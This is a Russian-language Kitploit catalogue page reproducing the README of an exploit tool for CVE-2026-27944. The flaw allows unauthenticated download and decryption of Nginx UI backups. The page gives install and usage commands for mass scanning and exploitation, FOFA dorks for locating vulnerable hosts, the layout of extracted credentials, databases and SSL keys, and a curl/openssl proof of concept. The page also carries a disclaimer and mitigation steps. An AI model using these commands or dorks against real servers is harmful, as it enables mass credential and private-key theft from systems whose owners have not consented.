Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Cve-2026-27944-Tools-Exploit — Как хочешь. | Kitploit
Инструменты/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
РазведкаИнструменты шифрования/дешифрованияАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информации
GitHubbimabalance/cve-2026-27944-tools-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Cve-2026-27944-Tools-Exploit

Как хочешь.

Репозиторий
11 месяц назадЕщё не проверено

🚀 CVE-2026-27944: Эксплойт для неавторизованного резервного копирования Nginx UI

📌 Описание

27944.py — это инструмент эксплуатации для CVE-2026-27944, позволяющий злоумышленнику загружать и расшифровывать резервные копии Nginx UI без аутентификации.

Уязвимость присутствует в Nginx UI версии < 2.3.2 и предоставляет доступ к:

· Учетным данным пользователей и токенам сессий · Закрытым ключам SSL · Конфигурации Nginx · Файлам базы данных

🔧 Функции

· ✅ Массовое сканирование из файла целей · ✅ Эксплуатация одиночной цели · ✅ Автоматическая загрузка резервной копии · ✅ Автоматическое дешифрование AES-256-CBC · ✅ Автоматическое извлечение учетных данных из резервной копии

🛠️ Установка

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 Использование

  1. Массовое сканирование
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. Эксплуатация одиночной цели
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. Полная эксплуатация
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 Формат целей

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 Dork FOFA

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 Результаты вывода

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ Отказ от ответственности

Этот инструмент создан в образовательных целях и для тестирования безопасности в этичном контексте. Автор не несет ответственности за неправомерное использование данного инструмента. Используйте только на системах, которыми вы владеете или на тестирование которых имеете письменное разрешение.

📝 Технические пояснения

CVE-2026-27944 — критическая уязвимость в Nginx UI, позволяющая злоумышленнику получить доступ к конечной точке /api/backup без аутентификации. Резервная копия содержит конфиденциальные данные, зашифрованные с помощью AES-256, однако ключ и вектор инициализации передаются в заголовке X-Backup-Security в формате Base64.

Оценка CVSS: 9.8 (критическая)

Затрагиваемые версии: Nginx UI < 2.3.2

Способы смягчения:

  1. Обновить Nginx UI до версии v2.3.3
  2. Заблокировать доступ к /api/backup
  3. Сменить все учетные данные

💀 POC

root@kitploit:~
# Проверка уязвимости
curl -I http://target:9000/api/backup

# Загрузка резервной копии
curl -s http://target:9000/api/backup -o backup.bin

# Расшифровка резервной копии (вручную)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
Скачать инструмент